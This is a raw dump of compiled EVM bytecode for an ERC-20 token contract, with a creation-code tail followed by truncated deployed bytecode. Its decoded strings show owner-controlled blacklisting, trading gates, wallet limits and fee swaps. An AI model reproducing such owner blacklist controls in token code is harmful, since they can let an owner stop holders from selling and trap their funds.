260200160002060009054906101000a900460ff16806119c05750601960008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b6119ff576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119f69061381b565b60405180910390fd5b5b601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015611aa35750601a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611b4a57600d54811115611aed576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ae4906138ad565b60405180910390fd5b600e54611af983610c89565b82611b049190613156565b1115611b45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b3c90613919565b60405180910390fd5b611f89565b601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015611bed5750601a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611dfa57600d54811115611c37576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c2e906139ab565b60405180910390fd5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015611cdb5750601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b611d1a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d1190613a17565b60405180910390fd5b601060009054906101000a900460ff1615611db15743601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205410611db0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611da790613a83565b60405180910390fd5b5b42601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611f88565b601a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611f8757600e54611e5783610c89565b82611e629190613156565b1115611ea3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e9a90613919565b60405180910390fd5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015611f475750601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b611f86576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f7d90613a17565b60405180910390fd5b5b5b5b5b6000611f9530610c89565b90506000600f548210159050808015611fba5750601060029054906101000a900460ff165b8015611fd35750600b60149054906101000a900460ff16155b80156120295750601c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b801561207f5750601960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156120d55750601960008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612119576001600b60146101000a81548160ff0219169083151502179055506120fd612836565b6000600b60146101000a81548160ff0219169083151502179055505b6000600b60149054906101000a900460ff16159050601960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806121cf5750601960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156121d957600090505b60008115612360576000601c60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561223e57506000601454115b1561226457601654600754111561225957601254905061225f565b60145490505b6122fa565b601c60008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156122bf57506000601354115b156122f95760155460075411156122da5760115490506122f8565b6013549050600760008154809291906122f290613aa3565b91905055505b5b5b61232060646123128389612a4690919063ffffffff16565b612a5c90919063ffffffff16565b915081601860008282546123349190613156565b9250508190555060008211156123505761234f8830846125c0565b5b818661235c9190613aeb565b9550505b61236b8787876125c0565b505050505b505050565b61237d6114b0565b73ffffffffffffffffffffffffffffffffffffffff1661239b610dc6565b73ffffffffffffffffffffffffffffffffffffffff16146123f1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123e890613b6b565b60405180910390fd5b565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b600060648211156125a0576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161259790613bfd565b60405180910390fd5b606482846125ae9190613c1d565b6125b89190613c8e565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361262f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126269061371d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361269e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612695906137af565b60405180910390fd5b6126a9838383612a72565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561272f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161272690613d31565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161281d9190612cee565b60405180910390a3612830848484612a77565b50505050565b600061284130610c89565b905060006018549050600080600084148061285c5750600083145b1561286a5750505050612a44565b8061293d573073ffffffffffffffffffffffffffffffffffffffff1663a9059cbb600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166128d760646128c960c3600e54612a4690919063ffffffff16565b612a5c90919063ffffffff16565b6040518363ffffffff1660e01b81526004016128f492919061341e565b6020604051808303816000875af1158015612913573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190612937919061345c565b50600190505b6000600f5485101561294f5784612953565b600f545b9050600047905061296382612a7c565b60006129788247612cbf90919063ffffffff16565b905060006129a38761299560185485612a4690919063ffffffff16565b612a5c90919063ffffffff16565b90506000601881905550600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16816040516129f390613d82565b60006040518083038185875af1925050503d8060008114612a30576040519150601f19603f3d011682016040523d82523d6000602084013e612a35565b606091505b50508096505050505050505050505b565b60008183612a549190613c1d565b905092915050565b60008183612a6a9190613c8e565b905092915050565b505050565b505050565b6000600267ffffffffffffffff811115612a9957612a98613d97565b5b604051908082528060200260200182016040528015612ac75781602001602082028036833780820191505090505b5090503081600081518110612adf57612ade613dc6565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612b86573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190612baa9190613e0a565b81600181518110612bbe57612bbd613dc6565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050612c2530600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846114b8565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b8152600401612c89959493929190613ef5565b600060405180830381600087803b158015612ca357600080fd5b505af1158015612cb7573d6000803e3d6000fd5b505050505050565b60008183612ccd9190613aeb565b905092915050565b6000819050919050565b612ce881612cd5565b82525050565b6000602082019050612d036000830184612cdf565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015612d43578082015181840152602081019050612d28565b60008484015250505050565b6000601f19601f8301169050919050565b6000612d6b82612d09565b612d758185612d14565b9350612d85818560208601612d25565b612d8e81612d4f565b840191505092915050565b60006020820190508181036000830152612db38184612d60565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000612deb82612dc0565b9050919050565b612dfb81612de0565b8114612e0657600080fd5b50565b600081359050612e1881612df2565b92915050565b612e2781612cd5565b8114612e3257600080fd5b50565b600081359050612e4481612e1e565b92915050565b60008060408385031215612e6157612e60612dbb565b5b6000612e6f85828601612e09565b9250506020612e8085828601612e35565b9150509250929050565b60008115159050919050565b612e9f81612e8a565b82525050565b6000602082019050612eba6000830184612e96565b92915050565b600080600060608486031215612ed957612ed8612dbb565b5b6000612ee786828701612e09565b9350506020612ef886828701612e09565b9250506040612f0986828701612e35565b9150509250925092565b612f1c81612de0565b82525050565b6000602082019050612f376000830184612f13565b92915050565b600060ff82169050919050565b612f5381612f3d565b82525050565b6000602082019050612f6e6000830184612f4a565b92915050565b600060208284031215612f8a57612f89612dbb565b5b6000612f9884828501612e09565b91505092915050565b6000819050919050565b6000612fc6612fc1612fbc84612dc0565b612fa1565b612dc0565b9050919050565b6000612fd882612fab565b9050919050565b6000612fea82612fcd565b9050919050565b612ffa81612fdf565b82525050565b60006020820190506130156000830184612ff1565b92915050565b61302481612e8a565b811461302f57600080fd5b50565b6000813590506130418161301b565b92915050565b6000806040838503121561305e5761305d612dbb565b5b600061306c85828601612e09565b925050602061307d85828601613032565b9150509250929050565b6000806040838503121561309e5761309d612dbb565b5b60006130ac85828601612e09565b92505060206130bd85828601612e09565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061310e57607f821691505b602082108103613121576131206130c7565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061316182612cd5565b915061316c83612cd5565b925082820190508082111561318457613183613127565b5b92915050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b60006131e6603983612d14565b91506131f18261318a565b604082019050919050565b60006020820190508181036000830152613215816131d9565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000613278602583612d14565b91506132838261321c565b604082019050919050565b600060208201905081810360008301526132a78161326b565b9050919050565b7f54726164696e6720697320616c7265616479206f70656e000000000000000000600082015250565b60006132e4601783612d14565b91506132ef826132ae565b602082019050919050565b60006020820190508181036000830152613313816132d7565b9050919050565b6000819050919050565b600061333f61333a6133358461331a565b612fa1565b612cd5565b9050919050565b61334f81613324565b82525050565b600060c08201905061336a6000830189612f13565b6133776020830188612cdf565b6133846040830187613346565b6133916060830186613346565b61339e6080830185612f13565b6133ab60a0830184612cdf565b979650505050505050565b6000815190506133c581612e1e565b92915050565b6000806000606084860312156133e4576133e3612dbb565b5b60006133f2868287016133b6565b9350506020613403868287016133b6565b9250506040613414868287016133b6565b9150509250925092565b60006040820190506134336000830185612f13565b6134406020830184612cdf565b9392505050565b6000815190506134568161301b565b92915050565b60006020828403121561347257613471612dbb565b5b600061348084828501613447565b91505092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006134e5602683612d14565b91506134f082613489565b604082019050919050565b60006020820190508181036000830152613514816134d8565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000613577602483612d14565b91506135828261351b565b604082019050919050565b600060208201905081810360008301526135a68161356a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000613609602283612d14565b9150613614826135ad565b604082019050919050565b60006020820190508181036000830152613638816135fc565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000613675601d83612d14565b91506136808261363f565b602082019050919050565b600060208201905081810360008301526136a481613668565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000613707602583612d14565b9150613712826136ab565b604082019050919050565b60006020820190508181036000830152613736816136fa565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000613799602383612d14565b91506137a48261373d565b604082019050919050565b600060208201905081810360008301526137c88161378c565b9050919050565b7f54726164696e67206973206e6f74206163746976652e00000000000000000000600082015250565b6000613805601683612d14565b9150613810826137cf565b602082019050919050565b60006020820190508181036000830152613834816137f8565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b6000613897603583612d14565b91506138a28261383b565b604082019050919050565b600060208201905081810360008301526138c68161388a565b9050919050565b7f4d61782077616c6c657420657863656564656400000000000000000000000000600082015250565b6000613903601383612d14565b915061390e826138cd565b602082019050919050565b60006020820190508181036000830152613932816138f6565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b6000613995603683612d14565b91506139a082613939565b604082019050919050565b600060208201905081810360008301526139c481613988565b9050919050565b7f596f7572206163636f756e7420697320626c61636b6c69737465642100000000600082015250565b6000613a01601c83612d14565b9150613a0c826139cb565b602082019050919050565b60006020820190508181036000830152613a30816139f4565b9050919050565b7f5472616e736665722044656c617920656e61626c65642e000000000000000000600082015250565b6000613a6d601783612d14565b9150613a7882613a37565b602082019050919050565b60006020820190508181036000830152613a9c81613a60565b9050919050565b6000613aae82612cd5565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203613ae057613adf613127565b5b600182019050919050565b6000613af682612cd5565b9150613b0183612cd5565b9250828203905081811115613b1957613b18613127565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000613b55602083612d14565b9150613b6082613b1f565b602082019050919050565b60006020820190508181036000830152613b8481613b48565b9050919050565b7f50657263656e74616765206d757374206265206265747765656e203020616e6460008201527f2031303000000000000000000000000000000000000000000000000000000000602082015250565b6000613be7602483612d14565b9150613bf282613b8b565b604082019050919050565b60006020820190508181036000830152613c1681613bda565b9050919050565b6000613c2882612cd5565b9150613c3383612cd5565b9250828202613c4181612cd5565b91508282048414831517613c5857613c57613127565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000613c9982612cd5565b9150613ca483612cd5565b925082613cb457613cb3613c5f565b5b828204905092915050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000613d1b602683612d14565b9150613d2682613cbf565b604082019050919050565b60006020820190508181036000830152613d4a81613d0e565b9050919050565b600081905092915050565b50565b6000613d6c600083613d51565b9150613d7782613d5c565b600082019050919050565b6000613d8d82613d5f565b9150819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050613e0481612df2565b92915050565b600060208284031215613e2057613e1f612dbb565b5b6000613e2e84828501613df5565b91505092915050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b613e6c81612de0565b82525050565b6000613e7e8383613e63565b60208301905092915050565b6000602082019050919050565b6000613ea282613e37565b613eac8185613e42565b9350613eb783613e53565b8060005b83811015613ee8578151613ecf8882613e72565b9750613eda83613e8a565b925050600181019050613ebb565b5085935050505092915050565b600060a082019050613f0a6000830188612cdf565b613f176020830187613346565b8181036040830152613f298186613e97565b9050613f386060830185612f13565b613f456080830184612cdf565b969550505050505056fea2646970667358221220d4b3583284df50f829e64f664fc5b397190063d98451826eb942ef6ee3e585c764736f6c63430008130033

Deployed Bytecode

0x60806040526004361061024a5760003560e01c8063751039fc11610139578063c0246668116100b6578063e2f456051161007a578063e2f45605146108a5578063e5071b8e146108d0578063e78cea92146108e7578063f2fde38b14610912578063f8b45b051461093b578063ffb54a991461096657610251565b8063c0246668146107d2578063c8c8ebe4146107fb578063c9567bf914610826578063ca7030751461083d578063dd62ed3e1461086857610251565b806395d89b41116100fd57806395d89b41146106c75780639a7a23d6146106f2578063a457c2d71461071b578063a9059cbb14610758578063bfd792841461079557610251565b8063751039fc146105f45780637571336a1461060b57806375f0a874146106345780637f2feddc1461065f5780638da5cb5b1461069c57610251565b806339509351116101c757806363c6f9121161018b57806363c6f912146105235780636b9990531461054c5780636ddd17131461057557806370a08231146105a0578063715018a6146105dd57610251565b806339509351146104285780634320bcf11461046557806349bd5a5e146104905780634fbee193146104bb578063583e0568146104f857610251565b80631f3fed8f1161020e5780631f3fed8f1461033f57806323b872dd1461036a57806327c8f835146103a7578063311028af146103d2578063313ce567146103fd57610251565b806306661abd1461025657806306fdde0314610281578063095ea7b3146102ac5780630a702e8d146102e957806318160ddd1461031457610251565b3661025157005b600080fd5b34801561026257600080fd5b5061026b610991565b6040516102789190612cee565b60405180910390f35b34801561028d57600080fd5b50610296610997565b6040516102a39190612d99565b60405180910390f35b3480156102b857600080fd5b506102d360048036038101906102ce9190612e4a565b610a29565b6040516102e09190612ea5565b60405180910390f35b3480156102f557600080fd5b506102fe610a4c565b60405161030b9190612ea5565b60405180910390f35b34801561032057600080fd5b50610329610a5f565b6040516103369190612cee565b60405180910390f35b34801561034b57600080fd5b50610354610a69565b6040516103619190612cee565b60405180910390f35b34801561037657600080fd5b50610391600480360381019061038c9190612ec0565b610a6f565b60405161039e9190612ea5565b60405180910390f35b3480156103b357600080fd5b506103bc610a9e565b6040516103c99190612f22565b60405180910390f35b3480156103de57600080fd5b506103e7610aa4565b6040516103f49190612cee565b60405180910390f35b34801561040957600080fd5b50610412610aaa565b60405161041f9190612f59565b60405180910390f35b34801561043457600080fd5b5061044f600480360381019061044a9190612e4a565b610ab3565b60405161045c9190612ea5565b60405180910390f35b34801561047157600080fd5b5061047a610aea565b6040516104879190612f22565b60405180910390f35b34801561049c57600080fd5b506104a5610b10565b6040516104b29190612f22565b60405180910390f35b3480156104c757600080fd5b506104e260048036038101906104dd9190612f74565b610b34565b6040516104ef9190612ea5565b60405180910390f35b34801561050457600080fd5b5061050d610b8a565b60405161051a9190613000565b60405180910390f35b34801561052f57600080fd5b5061054a60048036038101906105459190612f74565b610bb0565b005b34801561055857600080fd5b50610573600480360381019061056e9190612f74565b610c13565b005b34801561058157600080fd5b5061058a610c76565b6040516105979190612ea5565b60405180910390f35b3480156105ac57600080fd5b506105c760048036038101906105c29190612f74565b610c89565b6040516105d49190612cee565b60405180910390f35b3480156105e957600080fd5b506105f2610cd1565b005b34801561060057600080fd5b50610609610ce5565b005b34801561061757600080fd5b50610632600480360381019061062d9190613047565b610d25565b005b34801561064057600080fd5b50610649610d88565b6040516106569190612f22565b60405180910390f35b34801561066b57600080fd5b5061068660048036038101906106819190612f74565b610dae565b6040516106939190612cee565b60405180910390f35b3480156106a857600080fd5b506106b1610dc6565b6040516106be9190612f22565b60405180910390f35b3480156106d357600080fd5b506106dc610df0565b6040516106e99190612d99565b60405180910390f35b3480156106fe57600080fd5b5061071960048036038101906107149190613047565b610e82565b005b34801561072757600080fd5b50610742600480360381019061073d9190612e4a565b610f26565b60405161074f9190612ea5565b60405180910390f35b34801561076457600080fd5b5061077f600480360381019061077a9190612e4a565b610f9d565b60405161078c9190612ea5565b60405180910390f35b3480156107a157600080fd5b506107bc60048036038101906107b79190612f74565b610fc0565b6040516107c99190612ea5565b60405180910390f35b3480156107de57600080fd5b506107f960048036038101906107f49190613047565b610fe0565b005b34801561080757600080fd5b50610810611091565b60405161081d9190612cee565b60405180910390f35b34801561083257600080fd5b5061083b611097565b005b34801561084957600080fd5b50610852611306565b60405161085f9190612cee565b60405180910390f35b34801561087457600080fd5b5061088f600480360381019061088a9190613087565b61130c565b60405161089c9190612cee565b60405180910390f35b3480156108b157600080fd5b506108ba611393565b6040516108c79190612cee565b60405180910390f35b3480156108dc57600080fd5b506108e5611399565b005b3480156108f357600080fd5b506108fc6113ee565b6040516109099190612f22565b60405180910390f35b34801561091e57600080fd5b5061093960048036038101906109349190612f74565b611414565b005b34801561094757600080fd5b50610950611497565b60405161095d9190612cee565b60405180910390f35b34801561097257600080fd5b5061097b61149d565b6040516109889190612ea5565b60405180910390f35b60065481565b6060600380546109a6906130f6565b80601f01602080910402602001604051908101604052809291908181526020018280546109d2906130f6565b8015610a1f5780601f106109f457610100808354040283529160200191610a1f565b820191906000526020600020905b815481529060010190602001808311610a0257829003601f168201915b5050505050905090565b600080610a346114b0565b9050610a418185856114b8565b600191505092915050565b601060009054906101000a900460ff1681565b6000600254905090565b60185481565b600080610a7a6114b0565b9050610a87858285611681565b610a9285858561170d565b60019150509392505050565b61dead81565b600c5481565b60006012905090565b600080610abe6114b0565b9050610adf818585610ad0858961130c565b610ada9190613156565b6114b8565b600191505092915050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b7f000000000000000000000000f823ad018b0c30a6710a3640c4583f444e31323381565b6000601960008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b610bb8612375565b6001601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b610c1b612375565b6000601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b601060029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610cd9612375565b610ce360006123f3565b565b610ced612375565b6000610cf7610a5f565b905080600d8190555080600e819055506000601060006101000a81548160ff02191690831515021790555050565b610d2d612375565b80601a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b601e6020528060005260406000206000915090505481565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610dff906130f6565b80601f0160208091040260200160405190810160405280929190818152602001828054610e2b906130f6565b8015610e785780601f10610e4d57610100808354040283529160200191610e78565b820191906000526020600020905b815481529060010190602001808311610e5b57829003601f168201915b5050505050905090565b610e8a612375565b7f000000000000000000000000f823ad018b0c30a6710a3640c4583f444e31323373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0f906131fc565b60405180910390fd5b610f2282826124b9565b5050565b600080610f316114b0565b90506000610f3f828661130c565b905083811015610f84576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f7b9061328e565b60405180910390fd5b610f9182868684036114b8565b60019250505092915050565b600080610fa86114b0565b9050610fb581858561170d565b600191505092915050565b601d6020528060005260406000206000915054906101000a900460ff1681565b610fe8612375565b80601960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7826040516110859190612ea5565b60405180910390a25050565b600d5481565b61109f612375565b601060019054906101000a900460ff16156110ef576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110e6906132fa565b60405180910390fd5b61111e30600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600c546114b8565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719473061117a605561116c30610c89565b61255a90919063ffffffff16565b600080611185610dc6565b426040518863ffffffff1660e01b81526004016111a796959493929190613355565b60606040518083038185885af11580156111c5573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906111ea91906133cb565b5050507f000000000000000000000000f823ad018b0c30a6710a3640c4583f444e31323373ffffffffffffffffffffffffffffffffffffffff1663095ea7b3600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b815260040161128a92919061341e565b6020604051808303816000875af11580156112a9573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906112cd919061345c565b506001601060026101000a81548160ff0219169083151502179055506001601060016101000a81548160ff021916908315150217905550565b60075481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600f5481565b6001600660008282546113ac9190613156565b925050819055507f06bef5f47a1a400f9ceb1f3700a329a4ced09a400f88dd3230d93e4c104c907f6006546040516113e49190612cee565b60405180910390a1565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b61141c612375565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361148b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611482906134fb565b60405180910390fd5b611494816123f3565b50565b600e5481565b601060019054906101000a900460ff1681565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611527576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161151e9061358d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611596576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161158d9061361f565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516116749190612cee565b60405180910390a3505050565b600061168d848461130c565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461170757818110156116f9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116f09061368b565b60405180910390fd5b61170684848484036114b8565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361177c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117739061371d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036117eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117e2906137af565b60405180910390fd5b60008103611804576117ff838360006125c0565b612370565b61180c610dc6565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415801561187a575061184a610dc6565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b80156118b35750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b80156118ed575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b80156119065750600b60149054906101000a900460ff16155b15611f8a57601060019054906101000a900460ff16611a0057601960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806119c05750601960008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b6119ff576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119f69061381b565b60405180910390fd5b5b601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015611aa35750601a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611b4a57600d54811115611aed576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ae4906138ad565b60405180910390fd5b600e54611af983610c89565b82611b